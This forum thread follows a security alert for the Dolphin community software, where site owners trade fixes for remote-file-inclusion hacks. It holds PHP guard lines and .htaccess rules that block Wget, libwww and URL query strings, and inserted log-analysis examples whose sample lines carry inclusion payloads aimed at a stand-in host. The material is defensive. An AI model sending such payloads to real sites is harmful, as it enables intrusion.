
unoboonex
IMPORTANT. Security Alert!
Comments
DosDawg (positive) | 55 days ago

glad to see you guys post, wish it had come a little quicker. this is the same thing i have been saying since it started though. there are critics that just don't believe you when you say something. i am the first to say when i think something is the developer's problem, but guys this was absolutely nothing to do with the script's development, and i will stand behind you on this one.

NOTE

- IXWEBHOSTING will not turn off their register_globals=on Bad HOST
- hostmonster has register_globals=on by default
- hfw has register_globals=on by default

these are the three that i know about. register_globals can be disabled per account, and if you are unsure if they are on, you can check your phpinfo() to see. you should look at the master value as well as the local value. the local value can be tweaked with php_flags if your host allows php access to your htaccess.

well enough about this. i have been dealing with this since wednesday. it appears to have slowed down. there are some sites that were affected that may still be up in the air, but other than that, i have not seen reports of other hacks.

later,
DosDawg
sammie (positive) | 55 days ago

There are a few of us that have our own dedicated servers, and i don't mean cheap ones either, i know myself and DosDawg both pay over $230 a month for dedicated servers, and we are starting to offer other members hosting. this is ideal because you have your dolphin sites hosted on a dedicated server that is in effect set up just for dolphin sites, because we use them for our own dolphin sites and make sure we keep them secure. maybe people need to understand that cheaper is just that, it's cheap and set up for the masses, it causes your sites to be slow, you get dumped once you hog too much ram or cpu and bandwidth. i am moving all my sites over to dolphin, as i believe it is the most secure ECMS and most advanced ECMS out there.
Cleeto | 55 days ago

i use hostmonster ... haven't been hacked yet... i don't think.... but where would i look to change the setting of this?
atomikjon | 55 days ago

I got hit hard and they got into my VPS at hostforweb and screwed up all my PHP sites. Unfortunately, I had to go to a 2-week-old backup and lost 150 members and many edits! They came in through a test site running 6.1 and hit my other regular sites.
atomikjon | 55 days ago

My host has it set off locally, but the master is on. So how did I get hacked?
bambie (negative) | 55 days ago

Well I have had professionals look at my site that has been hacked, and well they have informed me you have issues in your script. This was the e-mail I received:

> Hello,
> Whatever the script in /ray/ was, was exploitable and this is how the account was exploited and this malicious script uploaded.
> Regards,
> Richard F.
> Network Security Administrator

Personally boonex is passing the issues on when it is their problem.
nurke | 55 days ago

how is this boonex's problem/issue??? what don't you get? The script got in b/c hackers put it in...hackers put it in b/c your globals were on. Boonex can't control your server's hosting. Just do what you are told, and most importantly read/do every single step. use this issue to pick up those IPs and block them from accessing your account... just my 2 cents...
mscott (positive) | 55 days ago

DD are you sure? I'm almost positive HFW and Hostmonster both have them "off" by default?
bambie (negative) | 55 days ago

My server is fine and follows boonex requirements, boonex has holes in their script. Like i said a specialist looked into my site being hacked and part of ray is exploitable.
theGhost | 55 days ago

Yes. They are definitely exploiting the software and its connection to all other communities. I took your "MUST" and NO DIFFERENCE regardless of RG is on or off in the Web2.0 enviro. So frustrated and irritated I began developing a list of "hack attacking servers" and the places they are coming from. Here is my list in the last 24 hours:

RIPE Network Coordination Centre (50+ instances) RackVibe LLC Internet Specialties West ISWEST-BLK-1 HostForWeb Inc. SCNET (20+ instances) Global Net Access (5+ instances) HostForWeb Inc. HOSTFORWEB-1 (20+ instances) Advanced Internet Technologies Value Eyecare Network, INC (20+ instances) Bluehost Inc ADDD2NET COM INC DBA LUNARPAGES Latin American and Caribbean IP address Regional Registry Covad Communications Co ThePlanet.com Internet Services, Inc HostDime.com, Inc. tw telecom holdings, inc (10+ instances) Asia Pacific Network Information Centre

Although they are not INFECTING my Dolphin environments...They are punching the server at 3-5 min intervals revolving the attack off different Dolphins hosted throughout the NET. I'll keep playing with it and see if I can find a way to stop/block it.
avhow (positive) | 55 days ago

Hostmonster told me they are off. Maybe they are doing them server by server. Use their live chat to ask about your specific server if you are not sure. Your server name is available in cpanel.
avhow | 55 days ago

Hi,

Just a quickie - here if Hostforweb has globals on and Boonex recommend them as being perfect for Dolphin.... hmmm doesn't seem right somehow....

Cheers
Max
brenaris (negative) | 54 days ago

We were hacked as well, and yes, our register_globals was on. So, the problem was improper installation of Dolphin? Well, we paid Boonex to do our original Dolphin install!! Does this mean we can get our money back on that? It would hardly address the lost time we had fixing the problem, but it would be a start!

-- Jason
tango3d | 54 days ago

here is a snippet from my php.ini file. I am using hostmonster, they recommend to copy this file to all directories and sub directories which contain php files.

```ini
; You should do your best to write your scripts so that they do not require
; register_globals to be on; Using form variables as globals can easily lead
; to possible security problems, if the code is not very well thought of.
register_globals = Off
```
houseperu (positive) | 54 days ago

Let me comment on something. I have a JOOMLA site, www.guardiarepublicana.com/v02. It was hacked by someone who put a lot of links inside all the files of the joomla. Maybe you could think that this is not for this topic, but let me tell you that last week I installed a dolphin on the same site but with this URL: www.guardiarepublicana.com/v03. Today the v03 is empty, because it was hacked. I'm gonna give you some codes that this hacker put inside the files. Maybe that's gonna be important in order to solve the problem. Sorry for my English
nurke | 54 days ago

mscott....when I inquired about globals with hostforweb...first they asked for ftp and server login info...then they said that I need to switch them off myself. I assume they were on. I got them off, deleted content.inc.php and uploaded one from dolphin script, same with safehtml (I forgot the name of file now..) and since then I didn't get any warnings from HFW nor did I have any damages to the site.... I hope it stays that way.
mmijangos | 54 days ago

I have last version SmartPro Pack 2.0.2 and my server has register global=off, but it is reported as "attack-site" and has been blocked by google, www.acting.com/index.php, I need help please.
Rob1960 | 54 days ago

My site was hacked, and for some reason my safehtml.php had permissions set to 777. I restored from backup, and changed settings to 766, and things are better. Could someone tell me the proper permission settings for the Plugins directory, the safehtml directory, and safehtml.php file? Also, is there a document listing the proper settings for all directories, or possibly a script to check my site for proper settings?
Rob1960 | 54 days ago

Thanks, I will check that out. But in ./inc, I had header.inc.php set to 666. I just changed that to 644. Is that correct?
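A permission check of the kind asked about above, as an added example that is not part of the original thread or of Dolphin. It does not know Dolphin's required modes; it only reports entries whose "other" write bit is set, and the tree in `demo()` is constructed (`tmp/upload.tmp` is a hypothetical file).

```python
import os
import stat
import tempfile


def world_writable(mode):
    """True when the 'other' write bit (0o002) is set, as in 777, 766 and 666."""
    return bool(stat.S_IMODE(mode) & stat.S_IWOTH)


def audit(root):
    """Return sorted (relative path, octal mode) pairs for world-writable entries."""
    findings = []
    for base, dirs, files in os.walk(root):
        for name in dirs + files:
            path = os.path.join(base, name)
            info = os.lstat(path)              # lstat: inspect links, never follow them
            if stat.S_ISLNK(info.st_mode):
                continue                       # on Linux a symlink's own mode is ignored
            if world_writable(info.st_mode):
                rel = os.path.relpath(path, root)
                findings.append((rel, oct(stat.S_IMODE(info.st_mode))))
    return sorted(findings)


def demo():
    """Audit a constructed tree that uses the modes quoted in the thread."""
    layout = {                                 # constructed paths, not a real Dolphin tree
        "plugins/safehtml/safehtml.php": 0o766,
        "inc/header.inc.php": 0o644,
        "tmp/upload.tmp": 0o666,               # hypothetical file
    }
    old_umask = os.umask(0o022)                # keep the sample directories at 755
    try:
        with tempfile.TemporaryDirectory() as root:
            for rel, mode in layout.items():
                path = os.path.join(root, rel)
                os.makedirs(os.path.dirname(path), exist_ok=True)
                with open(path, "w"):
                    pass
                os.chmod(path, mode)
            return audit(root)
    finally:
        os.umask(old_umask)
```

Calling `audit()` on a site's document root lists every file and directory that any local account on a shared host can modify.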
clubk1d (positive) | 54 days ago

Maybe this could help you guys... before doing this, try to put on your root directory a php.ini file with a code inside that will disable register_globals to off... then do the following steps:

http://www.boonex.com/unity/forums/topic/fix-for-dolphin-exploit.htm
sammie | 54 days ago

add the following code to your ray/modules/global/inc/content.inc.php

add it at the top above the 1st require once command

```php
if (isset($_REQUEST['sIncPath'])) die ('Hacking attempt');
```

so it looks like this:

```php
// stop here if the request itself supplies sIncPath
if (isset($_REQUEST['sIncPath'])) die ('Hacking attempt');
require_once($sIncPath . "xml.inc.php");
require_once($sIncPath . "constants.inc.php");
require_once($sIncPath . "apiFunctions.inc.php");
```

this stops any remote includes being used

next edit /plugins/safehtml/HTMLSax3.php

add this at the top above the require once

```php
if (isset($_REQUEST['dir'])) die ('Hacking attempt');
```

so it looks like this:

```php
// stop here if the request itself supplies dir
if (isset($_REQUEST['dir'])) die ('Hacking attempt');
require_once( "{$dir['plugins']}safehtml/HTMLSax3/States.php" );
require_once( "{$dir['plugins']}safehtml/HTMLSax3/Decorators.php" );
```

this stops remote access to your directories

as my dedicated server is under constant attack from hackers trying to access the server via dolphin i paid them to look at the issue and this is what they have added to kill any remote access attempts

i paid for it, you got it for free, enjoy and be safe.

i have tested this on my working sites and there is no problem
DoLaugh | 54 days ago

Hey Sammie! Thanks so much, I added this code to the two files...do you have a solution for the tiny_mce? I keep getting files like this inserted in there also. Crap..I don't know...the C99 has probably opened up my entire site...I have no idea where all these backdoor trojans are at... Can I download my site and use my virus scan to find some of these? Any ideas are welcome.

DoLaugh
sammie | 54 days ago

the 1st code can apply to any file that's being exploited but test your site to make sure it does not affect its working

and yes i downloaded a hacked VPS and used my virus scanner to see what was infected. it had 19 infections on the one dolphin site
theGhost (positive) | 54 days ago

Good Job sammie! Or... I was working on this all day and... I simply changed my name servers to a landing page...in this case a godaddy landing page. Waited 15 minutes and reset the name servers back to my own. Stopped the attack cold. I broke the attack in mid stream and it hasn't returned. Yea for me...That was annoying. I simply removed my url as a potential attacking site probably from their master attack script. The attack only affects BoonEx hosted sites as many other sites on this particular server were unaffected. Someone definitely doesn't like Dolphin :( I'll of course monitor the situation over the next 48 hours to ensure no return. But for everyone else...Trying this will NOT affect your site and requires no script modifications for those who would rather not script write. Basically just hides your Dolphin in the Global Net for a few moments :)
gkcgautam | 53 days ago

Guys there are many other methods for hacking...even a completely secure script can be hacked... It happened with me a few weeks ago that a trojan came into my computer...and somehow copied my ftp account details while i was working through ftp. Then it added some coded script to all pages with names index.xxx, home.xxx and default.xxx. The task of the script was to download malware softwares to those computers which opened my site. Changing the ftp password and removing that script solved the issue... But notice that it had copied my ftp details. So it could do anything with site files. So guys be updated about various hacks...and try to avoid them.
VictorT | 53 days ago

We are about to release the Security patch. Everything is ready to go. But still waiting and looking at some details to be checked fully and unhurriedly. We would appreciate your patience.
theoneroom | 53 days ago

I added the above code suggested by Sammie in addition to some provided on expertzzz, for anyone, it goes in the root .htaccess file after the rewrite engine on statement, see below:

```apache
# refuse requests whose query string starts with http or ftp,
# or contains www. or https after its first character
RewriteCond %{QUERY_STRING} ^http [OR]
RewriteCond %{QUERY_STRING} ^.+www\. [OR]
RewriteCond %{QUERY_STRING} ^.+https [OR]
RewriteCond %{QUERY_STRING} ^ftp
RewriteRule .* - [L,F]
# refuse the libwww and Wget user agents
RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget
RewriteRule .* - [F]
```
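The conditions in sammie's guards and in the .htaccess rules above can also be run over an access log to see which requests they describe and which clients send them. This is an added example, not code from the thread or from BoonEx; it assumes Apache's combined log format, its sample lines are constructed, and it goes one step beyond the posted rules by percent-decoding each parameter value before testing it.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format: client, request line, status, size, referer, agent.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)[^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<agent>[^"]*)"'
)
GUARDED = re.compile(r'^(sIncPath|dir)(\[.*\])?$')   # parameters named in the thread
REMOTE = re.compile(r'^\s*(https?|ftp)://', re.I)    # value is a URL on another host
TOOLS = re.compile(r'^(libwww|Wget)')                # agents the .htaccess rules refuse

# Constructed sample lines; addresses and hosts are documentation placeholders.
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2000:00:00:01 +0000] "GET /ray/modules/global/inc/'
    'content.inc.php?sIncPath=http%3A%2F%2Fremote.example%2Fa.txt%3F HTTP/1.0" '
    '200 312 "-" "libwww-perl/5.805"',
    '192.0.2.10 - - [01/Jan/2000:00:03:07 +0000] "GET /plugins/safehtml/HTMLSax3.php'
    '?dir[plugins]=http://remote.example/b.txt? HTTP/1.0" 200 287 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2000:00:03:30 +0000] "GET /index.php HTTP/1.1" '
    '200 9120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jan/2000:00:04:02 +0000] "GET /search.php?q=dolphin HTTP/1.1" '
    '200 4410 "-" "Wget/1.10.2"',
]


def classify(line):
    """Return (client, [reasons]) for one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    reasons = []
    # parse_qsl percent-decodes, so http%3A%2F%2F is compared as http://
    for name, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        if GUARDED.match(name):
            reasons.append("guarded-param:" + name)
        if REMOTE.match(value):
            reasons.append("remote-url-in:" + name)
    if TOOLS.match(m["agent"]):
        reasons.append("scripted-agent")
    return m["ip"], reasons


def tally(lines):
    """Count flagged requests per client address."""
    results = filter(None, map(classify, lines))
    return Counter(ip for ip, reasons in results if reasons)
```

`tally()` gives the per-source counts for a block list, and a flagged request that was answered with status 200 marks a file to inspect.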
avhow | 53 days ago

Hi,

What I want to know is, if this register-globals off is such an important prerequisite for a secure site why do Boonex recommend HostForWeb who say they have them turned on by default? Why Boonex are you recommending a hosting company that violates your hosting recommendations?

Cheers
Max
DoLaugh | 53 days ago

When these Security patches are released....where do you go to download the patch?....expertzzz site or here on unity?
theoneroom | 53 days ago

avhow, that's a very good question that I would like answering myself, why are they recommending a hosting company that doesn't meet the requirements?
chitro | 53 days ago

Victor, would this be a full patch to go from 6.0x to latest version? We have not yet upgraded our site and are planning to do so this week.